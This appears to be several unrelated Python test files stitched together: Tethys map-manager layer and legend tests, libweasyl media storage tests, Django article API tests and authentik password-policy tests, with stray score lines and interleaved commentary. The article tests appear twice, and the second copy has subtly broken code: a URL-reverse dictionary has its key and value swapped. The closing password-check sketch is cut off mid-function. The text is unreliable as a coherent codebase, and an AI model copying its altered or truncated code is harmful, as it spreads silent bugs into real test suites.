'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': popup_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_excluded_properties(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
excluded_properties = ['id', 'foo', 'bar', 'baz']
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
excluded_properties=excluded_properties
)
opts = ret['options']
expected_data = {
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True,
'excluded_properties': ['id', 'type', 'layer_name', 'foo', 'bar', 'baz']
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_plottable(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
plottable=True
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name', 'plot'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True,
'plottable': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertDictEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_has_action(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
has_action=True
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True,
'has_action': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_extent(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
custom_extent = [1, 2, 3, 4]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
extent=custom_extent
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(custom_extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_style_map(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
style_map = {
'Point': {'ol.style.Style': {
'image': {'ol.style.Circle': {
'radius': 5,
'fill': {'ol.style.Fill': {
'color': 'red',
}},
'stroke': {'ol.style.Stroke': {
'color': 'blue',
}}
}}
}},
}
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
style_map=style_map
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
expected_layer_options = {
'visible': True,
'show_download': False,
'style_map': style_map
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual(expected_layer_options, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_not_visible(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
visible=False
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': False, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
@mock.patch('tethys_gizmos.gizmo_options.map_view.log') # mock out geometry attribute warning
def test_build_mv_layer_selectable(self, _):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
selectable=True
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(True, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_layer_id(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
layer_id = uuid.uuid4()
layer_id_str = str(layer_id)
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
layer_id=layer_id
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_id_str,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_geometry_attributes(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
geometry_attribute = 'geometry'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
geometry_attribute=geometry_attribute
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_name': layer_name,
'layer_id': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
self.assertEqual(geometry_attribute, ret['geometry_attribute'])
def test_vector_style_map(self):
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.get_vector_style_map()
self.assertIsInstance(ret, dict)
self.assertIn('Point', ret.keys())
self.assertIn('LineString', ret.keys())
self.assertIn('Polygon', ret.keys())
def test_get_plot_for_layer_feature(self):
ret = self.map_manager.get_plot_for_layer_feature(layer_name='layer1', feature_id='F001')
self.assertEqual('F001', ret[1][0]['name'])
self.assertEqual('layer1', ret[2]['xaxis']['title'])
@mock.patch.dict('tethysext.atcore.services.map_manager.MapManagerBase.COLOR_RAMPS', values={'Default': ''}, clear=True) # noqa: E501
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.generate_custom_color_ramp_divisions')
def test_build_legend(self, mock_gccrd):
mock_gccrd.return_value = {'val1': '100', 'val2': '200', 'color1': '#fff100', 'color2': '#ff8c00'}
mock_COLOR_RAMPS = {'Default': ''}
mock_crd_kwargs = {'min_value': 100, 'max_value': 200, 'num_divisions': 2}
mock_layer = {
'layer_name': 'test:layer_name', 'layer_title': 'Test_Title', 'layer_variable': 'test:layer_variable',
'layer_id': '', 'viewparams': None, 'env': None, 'color_ramp_division_kwargs': mock_crd_kwargs
}
expected = {
'legend_id': 'test_layer_variable',
'title': 'Test Title',
'divisions': OrderedDict([(100.0, '#fff100'), (200.0, '#ff8c00')]),
'color_list': mock_COLOR_RAMPS.keys(),
'layer_id': 'test:layer_name',
'min_value': 100,
'max_value': 200,
'color_ramp': 'Default',
'prefix': 'val',
'color_prefix': 'color',
'first_division': 1,
'units': 'Ft',
}
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_legend(mock_layer, units='Ft')
self.assertEqual(ret, expected)
@mock.patch.dict('tethysext.atcore.services.map_manager.MapManagerBase.COLOR_RAMPS', values={'Default': ''}, clear=True) # noqa: E501
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.generate_custom_color_ramp_divisions')
def test_build_legend_with_color_ramp(self, mock_gccrd):
mock_gccrd.return_value = {'val1': '100', 'val2': '200', 'color1': '#fff100', 'color2': '#ff8c00'}
mock_COLOR_RAMPS = {'Default': ''}
mock_crd_kwargs = {'min_value': 100, 'max_value': 200, 'num_divisions': 2, 'color_ramp': 'Default'}
mock_layer = {
'layer_name': 'test:layer_name', 'layer_title': 'Test_Title', 'layer_variable': 'test:layer_variable',
'layer_id': '', 'viewparams': None, 'env': None, 'color_ramp_division_kwargs': mock_crd_kwargs
}
expected = {
'legend_id': 'test_layer_variable',
'title': 'Test Title',
'divisions': OrderedDict([(100.0, '#fff100'), (200.0, '#ff8c00')]),
'color_list': mock_COLOR_RAMPS.keys(),
'layer_id': 'test:layer_name',
'min_value': 100,
'max_value': 200,
'color_ramp': 'Default',
'prefix': 'val',
'color_prefix': 'color',
'first_division': 1,
'units': 'Ft',
}
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_legend(mock_layer, units='Ft')
self.assertEqual(ret, expected)
| 0.673084 | 0.281677 |
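# Aside: the map_extent patching in the _build_mv_layer tests above relies on
# new_callable=mock.PropertyMock. A stripped-down, standalone illustration of
# that pattern (stdlib only; _DemoManager is a stand-in, not the atcore class):
from unittest import mock

class _DemoManager:
    @property
    def map_extent(self):
        return [0, 0, 0, 0]  # stand-in for a computed extent

# Properties must be patched on the class; PropertyMock makes attribute
# *access* (not a call) return the configured value.
with mock.patch.object(_DemoManager, 'map_extent',
                       new_callable=mock.PropertyMock) as mock_extent:
    mock_extent.return_value = [400, 300, 800, 100]
    assert _DemoManager().map_extent == [400, 300, 800, 100]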
from __future__ import unicode_literals
import pytest
from libweasyl.test.common import datadir
from libweasyl import images, media
def test_fetch_or_create_disk_media_item(staticdir, db):
"""
``MediaItem.fetch_or_create`` by default creates a disk media item,
populates its attributes, and stores the file on disk.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
item = media.MediaItem.fetch_or_create(data, file_type='png')
assert item.sha256 == 'a5deef985bde4438969b5f74a1864f7a5b1d127df3197b4fadf3f855201278b4'
assert item.file_type == 'png'
assert staticdir.join(
'static', 'media', 'a5', 'de', 'ef', 'a5deef985bde4438969b5f74a1864f7a5b1d127df3197b4fadf3f855201278b4.png'
).read(mode='rb') == data
def test_fetch_or_create_disk_media_item_with_attributes(db):
"""
Attributes can be passed in, which propagate to the media item object.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
item = media.MediaItem.fetch_or_create(data, file_type='png', attributes={'spam': 'eggs'})
assert item.attributes == {'spam': 'eggs'}
def test_fetch_or_create_disk_media_item_with_image(db):
"""
An image can be passed in, which pulls out width/height attributes and
autodetects the file type.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
im = images.from_buffer(data)
item = media.MediaItem.fetch_or_create(data, im=im)
assert item.file_type == 'png'
assert item.attributes == {'width': 1200, 'height': 6566}
def test_fetch_or_create_disk_media_item_with_image_and_attributes(db):
"""
Passing an image and attributes merges the two sets of attributes.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
im = images.from_buffer(data)
item = media.MediaItem.fetch_or_create(data, file_type='png', im=im, attributes={'spam': 'eggs'})
assert item.attributes == {'spam': 'eggs', 'width': 1200, 'height': 6566}
def test_fetch_or_create_disk_media_item_fetches_extant_items(db):
"""
Calling ``MediaItem.fetch_or_create`` with data that's already in the
database gives back the extant media item.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
item1 = media.MediaItem.fetch_or_create(data, file_type='png')
db.flush()
item2 = media.MediaItem.fetch_or_create(data, file_type='png')
assert item1.mediaid == item2.mediaid
def test_fetch_or_create_requires_file_type():
"""
A file type is required if an image isn't being passed in.
"""
pytest.raises(ValueError, media.MediaItem.fetch_or_create, b'spam')
def test_disk_media_item_display_url(db):
"""
Disk media items have a display_url that's fanned out from /static/media.
"""
data = datadir.join('1200x6566.png').read(mode='rb')
item = media.MediaItem.fetch_or_create(data, file_type='png')
assert item.display_url == (
'/static/media/a5/de/ef/a5deef985bde4438969b5f74a1864f7a5b1d127df3197b4fadf3f855201278b4.png')
def test_disk_media_item_display_url_ax_rule(db):
"""
The display_url replaces ``media/ad`` with ``media/ax`` because adblock
sucks.
"""
data = datadir.join('1x70.gif').read(mode='rb')
item = media.MediaItem.fetch_or_create(data, file_type='gif')
assert item.display_url == (
'/static/media/ax/b2/06/adb20677ffcfda9605812f7f47aaa94a9c9b3e1a0b365e43872dc55199f5f224.gif')
| libweasyl/libweasyl/test/test_media.py | 0.64579 | 0.451871 |
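# Aside: the display_url assertions above encode a content-addressed fan-out:
# files land under directories named after the first three byte-pairs of the
# SHA-256 digest, and the first 'media/ad' directory is rewritten to 'media/ax'
# to dodge ad blockers. A self-contained sketch of that derivation
# (illustrative only, not libweasyl's implementation):
import hashlib

def fanned_out_url(data: bytes, file_type: str) -> str:
    digest = hashlib.sha256(data).hexdigest()
    # First three byte-pairs become nested directories, e.g. a5/de/ef/.
    url = '/static/media/{}/{}/{}/{}.{}'.format(
        digest[0:2], digest[2:4], digest[4:6], digest, file_type)
    # Rewrite only the first directory component when it is 'ad'.
    return url.replace('/media/ad/', '/media/ax/', 1)

# Example with hypothetical bytes (not the test fixture):
print(fanned_out_url(b'spam', 'png'))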
from rest_framework import status
import json
from authors.apps.articles.helpers import get_time_to_read_article
from authors.apps.articles.tests.base_tests import BaseTest, API_Reverse
from authors.apps.articles.models import ArticlesModel
class ArticleTests(BaseTest):
def test_anyone_can_get_articles(self):
"""This method tests is anyone can access articles endpoint"""
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_logged_in_user_view_articles(self):
"""This method tests if a logged in user can access articles"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.get(
self.url, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_user_can_create_article(self):
"""This method tests if a user can create an article"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_articles_unauthorized_user(self):
"""This method checks if an unauthorized user cannot create an article"""
response = self.client.post(self.url, self.article, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_user_can_access_single_article(self):
"""This method checks if a user can access a single article"""
url = self.single_article_details()
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_user_cannot_create_without_title(self):
"""This method tests if a user can post without a title"""
self.article['article'].pop('title')
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_update(self):
"""This method checks if a user can update an existing articles"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
slug = response.data['slug']
url = API_Reverse('articles:article-details', {'slug': slug})
r = self.client.put(url, data={"article": {"title": "Updated Title", "body": "Updated body"}}, format='json', HTTP_AUTHORIZATION=token)
self.assertIn("Updated Title", json.dumps(r.data))
self.assertEqual(r.status_code, status.HTTP_200_OK)
def test_unauthorised_user_update(self):
"""This method tests if unauthorized user can update existing articles"""
url = self.single_article_details()
self.client.credentials(HTTP_AUTHORIZATION='')
r = self.client.put(url, data={"article": {"title": "Updated Title", "body": "Updated body"}}, format='json')
self.assertEqual(r.status_code, status.HTTP_403_FORBIDDEN)
def test_user_can_delete(self):
"""This method tests if a user can delete articles"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
slug = response.data['slug']
url = API_Reverse('articles:article-details', {'slug': slug})
r = self.client.delete(url, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(r.status_code, status.HTTP_200_OK)
self.assertIn("Article Deleted Successfully", json.dumps(r.data))
def test_unauthorised_user_delete(self):
"""This method tests if a non owner can delete an article"""
url = self.single_article_details()
self.client.credentials(HTTP_AUTHORIZATION='')
response = self.client.delete(url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_article_returns_url(self):
"""This method tests whether the API returns url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("url", json.dumps(response.data))
def test_if_article_returns_facebook_url(self):
"""This method tests whether the API returns facebook url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("facebook", json.dumps(response.data))
def test_if_article_returns_linkedin_url(self):
"""This method tests whether the API returns linkedin url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("Linkedin", json.dumps(response.data))
def test_if_article_returns_twitter_url(self):
"""This method tests whether the API returns twitter url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("twitter", json.dumps(response.data))
def test_if_article_returns_mail_url(self):
"""This method tests whether the API returns mail url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("mail", json.dumps(response.data)) | authors/apps/articles/tests/test_articles.py | from rest_framework import status
import json
from authors.apps.articles.helpers import get_time_to_read_article
from authors.apps.articles.tests.base_tests import BaseTest, API_Reverse
from authors.apps.articles.models import ArticlesModel
class ArticleTests(BaseTest):
def test_anyone_can_get_articles(self):
"""This method tests is anyone can access articles endpoint"""
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_logged_in_user_view_articles(self):
"""This method tests if a logged in user can access articles"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.get(
self.url, format='json', headers={'Authorization': token})
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_user_can_create_article(self):
"""This method tests if a user can create an article"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_articles_unauthorized_user(self):
"""This method checks if an unauthorized user cannot create an article"""
response = self.client.post(self.url, self.article, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_user_can_access_single_article(self):
"""This method checks if a user can access a single article"""
url = self.single_article_details()
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_user_cannot_create_without_title(self):
"""This method tests if a user can post without a title"""
self.article['article'].pop('title')
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_update(self):
"""This method checks if a user can update an existing articles"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
slug = response.data['slug']
url = API_Reverse('articles:article-details', {slug: 'slug'})
r = self.client.put(url, data={"article": {"title": "Updated Title", "body": "Updated body"}}, format='json', HTTP_AUTHORIZATION=token)
self.assertIn("Updated Title", json.dumps(r.data))
self.assertEqual(r.status_code, status.HTTP_200_OK)
def test_unauthorised_user_update(self):
"""This method tests if unauthorized user can update existing articles"""
url = self.single_article_details()
self.client.credentials(HTTP_AUTHORIZATION='')
r = self.client.put(url, data={"article": {"title": "Updated Title", "body": "Updated body"}}, format='json')
self.assertEqual(r.status_code, status.HTTP_403_FORBIDDEN)
def test_user_can_delete(self):
"""This method tests if a user can delete articles"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
slug = response.data['slug']
url = API_Reverse('articles:article-details', {slug: 'slug'})
r = self.client.delete(url, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(r.status_code, status.HTTP_200_OK)
self.assertIn("Article Deleted Successfully", json.dumps(r.data))
def test_unauthorised_user_delete(self):
"""This method tests if a non owner can delete an article"""
url = self.single_article_details()
self.client.credentials(HTTP_AUTHORIZATION='')
response = self.client.delete(url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_article_returns_url(self):
"""This method tests whether the API returns url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("url", json.dumps(response.data))
def test_if_article_returns_facebook_url(self):
"""This method tests whether the API returns facebook url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("facebook", json.dumps(response.data))
def test_if_article_returns_linkedin_url(self):
"""This method tests whether the API returns linkedin url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("Linkedin", json.dumps(response.data))
def test_if_article_returns_twitter_url(self):
"""This method tests whether the API returns twitter url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("twitter", json.dumps(response.data))
def test_if_article_returns_mail_url(self):
"""This method tests whether the API returns mail url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("mail", json.dumps(response.data)) | 0.55652 | 0.180594 |
from django.test import TestCase
from guardian.shortcuts import get_anonymous_user
from authentik.lib.generators import generate_key
from authentik.policies.password.models import PasswordPolicy
from authentik.policies.types import PolicyRequest, PolicyResult
class TestPasswordPolicy(TestCase):
"""Test Password Policy"""
def setUp(self) -> None:
self.policy = PasswordPolicy.objects.create(
name="test_false",
amount_digits=1,
amount_uppercase=1,
amount_lowercase=2,
amount_symbols=3,
length_min=24,
error_message="test message",
)
def test_invalid(self):
"""Test without password"""
request = PolicyRequest(get_anonymous_user())
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages[0], "Password not set in context")
def test_failed_length(self):
"""Password too short"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_failed_lowercase(self):
"""not enough lowercase"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_failed_uppercase(self):
"""not enough uppercase"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_failed_symbols(self):
"""not enough symbols"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>!!!" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_failed_digits(self):
"""not enough digits"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>!!!" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_true(self):
"""Positive password case"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = <PASSWORD>_key() + "<PASSWORD>!!!" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertTrue(result.passing)
self.assertEqual(result.messages, tuple())
| authentik/policies/password/tests/test_policy.py | 0.500244 | 0.315532 |
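# Aside: a minimal, self-contained sketch of the complexity check the policy
# above exercises (same thresholds as the setUp; this mirrors the tests, not
# authentik's actual implementation):
def passes_policy(password: str,
                  amount_digits: int = 1,
                  amount_uppercase: int = 1,
                  amount_lowercase: int = 2,
                  amount_symbols: int = 3,
                  length_min: int = 24) -> bool:
    digits = sum(c.isdigit() for c in password)
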